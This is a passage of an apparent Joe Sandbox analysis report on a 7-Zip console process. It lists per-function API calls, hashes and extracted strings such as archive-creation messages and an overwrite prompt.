                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                • free.MSVCRT ref: 004423A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$mallocmemmovewcscmp
                                • String ID: A0$Hash$sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum
                                • API String ID: 1621466233-3656212537
                                • Opcode ID: 802e8e9a2c2ea77edc8e4468999b6a89d01a219b9ea440f3f32d330f1b06e641
                                • Instruction ID: ea66dda6d30de362066cc7bb801668e62465332f2be41672cc7ce8d685a70f0f
                                • Opcode Fuzzy Hash: 802e8e9a2c2ea77edc8e4468999b6a89d01a219b9ea440f3f32d330f1b06e641
                                • Instruction Fuzzy Hash: 44414832109B8486C720DF26F55039EFBE4F7D4B84F44421AAB9987BA9DBBCC595CB04
                                APIs
                                  • Part of subcall function 0041D298: GetModuleHandleW.KERNEL32 ref: 0041D2D4
                                  • Part of subcall function 0041D298: GetProcAddress.KERNEL32 ref: 0041D2ED
                                  • Part of subcall function 0041D298: free.MSVCRT ref: 0041D40F
                                  • Part of subcall function 0041D298: free.MSVCRT ref: 0041D41A
                                  • Part of subcall function 0041CC68: GetSystemInfo.KERNEL32 ref: 0041CC88
                                • strcmp.MSVCRT ref: 0041D66A
                                • free.MSVCRT ref: 0041D6C9
                                • free.MSVCRT ref: 0041D6D4
                                • free.MSVCRT ref: 0041D6DF
                                • free.MSVCRT ref: 0041D71B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$AddressHandleInfoModuleProcSystemstrcmp
                                • String ID: -
                                • API String ID: 3961349729-3695764949
                                • Opcode ID: b7cbed1331cb7d55189943225399f2c26065b17822c77ed4446776fd064686b3
                                • Instruction ID: 503fd2942fff9a8b30f2e542be57068dd23715f642d5bcc604009591d61e7b5b
                                • Opcode Fuzzy Hash: b7cbed1331cb7d55189943225399f2c26065b17822c77ed4446776fd064686b3
                                • Instruction Fuzzy Hash: 7F31967210464591CA10EB26F5512DEA730EBD2398F801127FA5E866B9DFBCC9D5CB08
                                APIs
                                • free.MSVCRT ref: 00462460
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfreememset
                                • String ID: Alternate streams$Alternate streams size$Files$Folders$Size
                                • API String ID: 3433497869-232602582
                                • Opcode ID: 6fcc76a1e59de7e7b71cc1d779308d819524d07daae1383483ddc2ba5f22816f
                                • Instruction ID: 12b830fe814fdb580feda120518f95f71214cdbc8b60611b6e7d4f9604f24e20
                                • Opcode Fuzzy Hash: 6fcc76a1e59de7e7b71cc1d779308d819524d07daae1383483ddc2ba5f22816f
                                • Instruction Fuzzy Hash: 4031D461204A8052CA28EB27E6503EE6311F742BD8F484217DF5E57BA2EFACD495C34A
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$FileMove
                                • String ID:
                                • API String ID: 288606353-0
                                • Opcode ID: 57cac637d8e0234f60b055ac2bc110f97c18c8dc58c2764d229503f95f95ff27
                                • Instruction ID: 5ff01b2848e61010cf905f0cd56ebc457c5698a42ede1c3e93d48101b3d08761
                                • Opcode Fuzzy Hash: 57cac637d8e0234f60b055ac2bc110f97c18c8dc58c2764d229503f95f95ff27
                                • Instruction Fuzzy Hash: 4111A83324958555CB60AB26E8506EF5730EBC2BD4F441227FEAA87365DE2CC8C6C608
                                APIs
                                  • Part of subcall function 004182EC: FindClose.KERNELBASE ref: 004182FE
                                • SetLastError.KERNEL32 ref: 0041854A
                                • SetLastError.KERNEL32 ref: 00418559
                                • FindFirstStreamW.KERNELBASE ref: 0041857B
                                • GetLastError.KERNEL32 ref: 0041858A
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLast$Find$CloseFirstStream
                                • String ID:
                                • API String ID: 4071060300-0
                                • Opcode ID: 87f636497580bb4fbcbf63b8265a63744168a08ebcc718e05caac09440743ee9
                                • Instruction ID: 31027ac60542b8a9e9ee3a78a1b9bb681ab34fb68ed7dbce223036002067976c
                                • Opcode Fuzzy Hash: 87f636497580bb4fbcbf63b8265a63744168a08ebcc718e05caac09440743ee9
                                • Instruction Fuzzy Hash: 5C21C772204A4092DB709B22E4443EE5361FB9A778F544326EE7A477D4DF3CC985C208
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: freememmove$CompareCriticalEnterFileSectionTime
                                • String ID:
                                • API String ID: 706800807-0
                                • Opcode ID: 58a0885f6d86d70a921f35c9044090e0a72a65f2069e27a2fc9408c344482038
                                • Instruction ID: 2cf5df8f9ae944450c3e6d46bfe07795dc8c83c448cfb5fa16807a673740a3a8
                                • Opcode Fuzzy Hash: 58a0885f6d86d70a921f35c9044090e0a72a65f2069e27a2fc9408c344482038
                                • Instruction Fuzzy Hash: C22191B220168596DB14DF36D44439D3360F325F98F944226CF5D43399EF38C99AC745
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree$memset
                                • String ID: Name$Size
                                • API String ID: 219391080-481755742
                                • Opcode ID: f50bf753fe3b21e9c7a45b0368b88930d19db5076f6c523b08c3b18d06e9c53f
                                • Instruction ID: d8759a9b581f4048fd1ba7a87abba3f5ce9ace1fbee7d5f5e10bfd4d542aedf1
                                • Opcode Fuzzy Hash: f50bf753fe3b21e9c7a45b0368b88930d19db5076f6c523b08c3b18d06e9c53f
                                • Instruction Fuzzy Hash: ED41253271468482CB10DF26D6907AE2361F345BD9F889127EF2A47765EF3DC982C30A
                                APIs
                                Strings
                                • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 0046D052
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree
                                • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                • API String ID: 2581285248-171671738
                                • Opcode ID: 646732ebcff86c9df6dad86610872ba6a7d61547c425be7e6e005f2518e3d884
                                • Instruction ID: 1e9d3c8385b3f1383ec98ee077551b751496891265af3d5d7d58115ec2353fdd
                                • Opcode Fuzzy Hash: 646732ebcff86c9df6dad86610872ba6a7d61547c425be7e6e005f2518e3d884
                                • Instruction Fuzzy Hash: 1D317262F0864887EA209B15D9A13EA1361D38679CF440127DB4A477A6FA9DCDD6830B
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: eb28851d751b3b4e06c9240cb3829b97f60d0f29b318ad5cc70f7edf96630afe
                                • Instruction ID: e2aacf706a07b237766b50525a1b6b0aa60c555cbeaf6df2e69f55aa9a5a4e85
                                • Opcode Fuzzy Hash: eb28851d751b3b4e06c9240cb3829b97f60d0f29b318ad5cc70f7edf96630afe
                                • Instruction Fuzzy Hash: EE317032215A4891CA20EF22E5511DE6720EBC5B99B444227BE5E9B7B9DE3CC9C6C704
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$fputc
                                • String ID: Time =
                                • API String ID: 1185151155-458291097
                                • Opcode ID: 711248068497e3291dd49fbd5432339c07565143dcf9c95a36100e20513cfbb6
                                • Instruction ID: 4df6600268dbd9c68b32612bc985381e3f2cab0479c4d1ee237d21fa28dac7ca
                                • Opcode Fuzzy Hash: 711248068497e3291dd49fbd5432339c07565143dcf9c95a36100e20513cfbb6
                                • Instruction Fuzzy Hash: 9121A8D5351A1186EB08AF1BEC4035A5311A798FC8F48A036DF0E177A8DE3CC896C308
                                APIs
                                • fputs.MSVCRT ref: 0046BF9D
                                • free.MSVCRT ref: 0046BFA9
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$freememset
                                • String ID: Archive size: $Files read from disk$Volumes:
                                • API String ID: 2276422817-73833580
                                • Opcode ID: 43f740754bcbdfb30a1c5616ebad1511aae0edfbe7f48177f9860e470449e485
                                • Instruction ID: d9fc8a18938d6b6f2efca78100774755689cafe505f73cfe97d332feb53b0244
                                • Opcode Fuzzy Hash: 43f740754bcbdfb30a1c5616ebad1511aae0edfbe7f48177f9860e470449e485
                                • Instruction Fuzzy Hash: 5C214F7220488590CF20EF25E9913DEA730E7847ACF844627A65E875B9DF6CC6DBC708
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 91324675b78ba19f9b05da73786a397c313983f0b342506a06a986321d12e703
                                • Instruction ID: 0349fe02bf539a8d79d67699f678fb2320e9a14fb45ebcf6b8e932ec95aae203
                                • Opcode Fuzzy Hash: 91324675b78ba19f9b05da73786a397c313983f0b342506a06a986321d12e703
                                • Instruction Fuzzy Hash: C401C832682A5C46C710AF32E9416ED1310E781BF9F440326EE395B795CE1CC8A28308
                                APIs
                                • fputs.MSVCRT ref: 00466DF0
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • free.MSVCRT ref: 00466E22
                                • fputs.MSVCRT ref: 00466E40
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree$fputc
                                • String ID: : $----------------
                                • API String ID: 3584323934-4071417161
                                • Opcode ID: a2e08ee020855fc09d43b6ad867d9afbb1a1935186b9ea7eaf3066c7f30c3438
                                • Instruction ID: 0c4f502f61c82300a81e5b435ccc6a7822ae503a772d3b205483b64dc3ebd4d4
                                • Opcode Fuzzy Hash: a2e08ee020855fc09d43b6ad867d9afbb1a1935186b9ea7eaf3066c7f30c3438
                                • Instruction Fuzzy Hash: 8F0165B6705A41C6DA20EB27EA9076A2321F785BE8F058326DF6E43794DF3CD492C704
                                APIs
                                • fputs.MSVCRT ref: 0046BE42
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                • fputs.MSVCRT ref: 0046BE6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$memset
                                • String ID: Creating archive: $StdOut$Updating archive:
                                • API String ID: 3543874852-1319951512
                                • Opcode ID: a9c4aabd2ff01d6524ba5e04df4a9e699f916eef4c00c3739375fc96b2054783
                                • Instruction ID: 90582fd62f6764cb73db887f6466bfccc6d5a683a7eecbcdd10d7b0a1d5a8302
                                • Opcode Fuzzy Hash: a9c4aabd2ff01d6524ba5e04df4a9e699f916eef4c00c3739375fc96b2054783
                                • Instruction Fuzzy Hash: 26012DA2301A4581EF04AF26D5943E92361EB44FD8F0895378F0E8B359EF2DC8D9C359
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 45413b0386e91511af95a0f8a487d460f1c606b597beb1b450eac350a4d7b625
                                • Instruction ID: 2bbfb319fc9bd896b0eb161cd569ebbbbef728913a36676f7fc18198983eb9b2
                                • Opcode Fuzzy Hash: 45413b0386e91511af95a0f8a487d460f1c606b597beb1b450eac350a4d7b625
                                • Instruction Fuzzy Hash: 67F0813379195D86CB11BE37EA510AC1320AB86FD87484227AF1D9F355DE6CCCE28384
                                APIs
                                • fputs.MSVCRT ref: 0046C000
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                • fputs.MSVCRT ref: 0046C043
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • free.MSVCRT ref: 0046C057
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree$fputc
                                • String ID: : $Write SFX:
                                • API String ID: 3584323934-2530961540
                                • Opcode ID: 4a627c73a7238c82c06dab0d44ee922f7b7063e7ca912513ee5259796f313b88
                                • Instruction ID: 978eab107f528d3652c645616572836bf123227a035189c349fdee9fde06c905
                                • Opcode Fuzzy Hash: 4a627c73a7238c82c06dab0d44ee922f7b7063e7ca912513ee5259796f313b88
                                • Instruction Fuzzy Hash: 000148A230494081DF20AB26E95439A5321E785FF8F48D3329E6D577E9DF6CC596C304
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 6aac4f8b66112ccdebbd1d1905c744c767a0f8c1bc3804467cf2c6bc99579525
                                • Instruction ID: f0b6af6329c11194e2649fdfde6d9ab5d88c1a81b251e3a1fb2e2d6f039b5ea6
                                • Opcode Fuzzy Hash: 6aac4f8b66112ccdebbd1d1905c744c767a0f8c1bc3804467cf2c6bc99579525
                                • Instruction Fuzzy Hash: 8FE0DC3265060D82DB14FB77E99116C1324E7D5F4C75411179E2DDF225CD5CCCA28384
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 30414a1d52f4da9f745089551c321dca5233e4042aa42c337b3be1ba5cafe1d0
                                • Instruction ID: 876f025dad5719d37607591b38ceac574e5d182b2dfd5891b6ecb81be8183bd8
                                • Opcode Fuzzy Hash: 30414a1d52f4da9f745089551c321dca5233e4042aa42c337b3be1ba5cafe1d0
                                • Instruction Fuzzy Hash: BA71E37332468492CB10DB26E88059EB3A0F3C4B99F404617EE9A4BB59DF7CC8D5CB08
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: strcmp
                                • String ID: =
                                • API String ID: 1004003707-2525689732
                                • Opcode ID: 0e249ffe8aca5e057bec8785a432b27c2d1d9d2ddb026999ed26aaef8aeed705
                                • Instruction ID: 9b6af6262b68e318425bdc34aa1e9d587cdd4708d1c5e20ce5ee3e0ffb5c7c84
                                • Opcode Fuzzy Hash: 0e249ffe8aca5e057bec8785a432b27c2d1d9d2ddb026999ed26aaef8aeed705
                                • Instruction Fuzzy Hash: 9461F33221968085CB20EF16E49159FBB61E7D9BD4F487127FB9B47729DA3CC886CB04
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 43209498332682a02e7ce7fc75598344194703a03d02bd2ff963372942ffa5f8
                                • Instruction ID: 1d59ad0aa14893634f672a2a1ac64e2cbc313bc2f7306347e7ab1c6e2584a36a
                                • Opcode Fuzzy Hash: 43209498332682a02e7ce7fc75598344194703a03d02bd2ff963372942ffa5f8
                                • Instruction Fuzzy Hash: CA812673305AD486CB10EF2AE4943AD77A2F385F88F494526DE5A0BB69CF78C885C315
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID: Q
                                • API String ID: 0-3463352047
                                • Opcode ID: abed10ad6c520b63a86a48af59b276bb77a8b7c20d7b3ab632993d914fae1161
                                • Instruction ID: 522e7fa084636e37b7d6d887b9bc75cdeb1e807cd88e278dbacbb7bc6f3f857c
                                • Opcode Fuzzy Hash: abed10ad6c520b63a86a48af59b276bb77a8b7c20d7b3ab632993d914fae1161
                                • Instruction Fuzzy Hash: 7E619172714A8482DB20DF26E48016EB361F7C8BA4F545217FF9A57758DB7CC882CB09
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: a0e6c24adbaa5689cbc3c6f00940dca7613124715223a3a9621f4f95d8ecc5a4
                                • Instruction ID: 51409177fed07a8b01f0540601f6fbf35b2b55e164cba517c7e65b19579d7696
                                • Opcode Fuzzy Hash: a0e6c24adbaa5689cbc3c6f00940dca7613124715223a3a9621f4f95d8ecc5a4
